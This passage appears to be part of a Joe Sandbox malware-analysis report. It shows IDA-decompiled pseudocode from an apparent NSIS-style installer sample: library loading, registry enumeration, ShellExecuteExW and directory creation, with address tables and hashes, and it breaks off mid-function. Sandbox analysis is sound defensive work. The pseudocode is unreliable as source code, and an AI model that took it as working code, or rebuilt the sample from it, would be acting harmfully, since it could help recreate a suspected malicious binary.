												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406f07
0x00406f07
0x00406f0b
0x00406f34
0x00406f3e
0x00406f0d
0x00406f16
0x00406f23
0x00406f26
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x0040726a
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2e0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406943(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E00405569(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B56( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 9e448226c772e48bc416196691c53060b7a1382dc3a556cf09b9042468cead7c
Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
Opcode Fuzzy Hash: 9e448226c772e48bc416196691c53060b7a1382dc3a556cf09b9042468cead7c
Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402DE6(_t29, 0x20019); // executed
				_t24 = _t9;
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
					}
					_t22[0x3ff] = _t16;
					_push(_t24);
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025a3
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.ADVAPI32 ref: 004025E4
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 1b7700dde8b70fd61657fb54fd5bd86add154d3b6e0b252f3c3b27d9e12e16af
Instruction ID: 8c40f98af4add78d59c4bc2bb7842a1dfdaddd4ec6c9bbdee1c196b88a33675a
Opcode Fuzzy Hash: 1b7700dde8b70fd61657fb54fd5bd86add154d3b6e0b252f3c3b27d9e12e16af
Instruction Fuzzy Hash: 61017CB1A04105BBEB159F94DE58AAFB66CEF40348F10403AF501B61D0EBB85E45966D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F12 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401F12(void* __ecx, void* __eflags) {
				intOrPtr _t20;
				void* _t39;
				void* _t42;
				void* _t47;

				_t42 = __ecx;
				_t45 = E00402DA6(_t39);
				_t20 = E00402DA6(0x31);
				_t43 = E00402DA6(0x22);
				E00402DA6(0x15);
				E00401423(0xffffffec);
				 *(_t47 - 0x88) =  *(_t47 - 0x20);
				 *((intOrPtr*)(_t47 - 0x84)) =  *((intOrPtr*)(_t47 - 8));
				 *((intOrPtr*)(_t47 - 0x70)) =  *((intOrPtr*)(_t47 - 0x24));
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t47 - 0x7c)) = _t20;
				 *(_t47 - 0x80) =  ~( *_t19) & _t45;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t47 - 0x74)) = 0x436000;
				 *(_t47 - 0x78) =  ~( *_t21) & _t43;
				if(E00405B2D(_t47 - 0x8c) == 0) {
					 *((intOrPtr*)(_t47 - 4)) = 1;
				} else {
					if(( *(_t47 - 0x88) & 0x00000040) != 0) {
						E0040697F(_t42,  *((intOrPtr*)(_t47 - 0x54)));
						_push( *((intOrPtr*)(_t47 - 0x54)));
						FindCloseChangeNotification(); // executed
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t47 - 4));
				return 0;
			}

0x00401f12
0x00401f1a
0x00401f1c
0x00401f2c
0x00401f2e
0x00401f35
0x00401f3d
0x00401f46
0x00401f4f
0x00401f58
0x00401f5a
0x00401f5f
0x00401f68
0x00401f6a
0x00401f73
0x00401f84
0x0040292e
0x00401f8a
0x00401f91
0x00401f9a
0x00401f9f
0x00401feb
0x00401feb
0x00401f91
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405B2D: ShellExecuteExW.SHELL32(?), ref: 00405B3C

Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32 ref: 004069B2

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FEB

Strings

@, xrefs: 00401F8A

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ChangeCloseCodeExecuteExitFindNotificationObjectProcessShellSingleWait
String ID: @
API String ID: 4215836453-2766056989
Opcode ID: e37f208942ae2f3de3a437f922321776b37299ba4f1f9dd4ee3f1e332c401e0f
Instruction ID: e5fb9d027c761589e680b1257b4cadef509076267ccb1bc0e8fa647dfd1f3a7d
Opcode Fuzzy Hash: e37f208942ae2f3de3a437f922321776b37299ba4f1f9dd4ee3f1e332c401e0f
Instruction Fuzzy Hash: 9C114971E042189ACB60EFB9CA49B8CB6F4AF08304F20457AE405F72D1EBBC89459B18

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E81(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E03(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AB5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A38( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
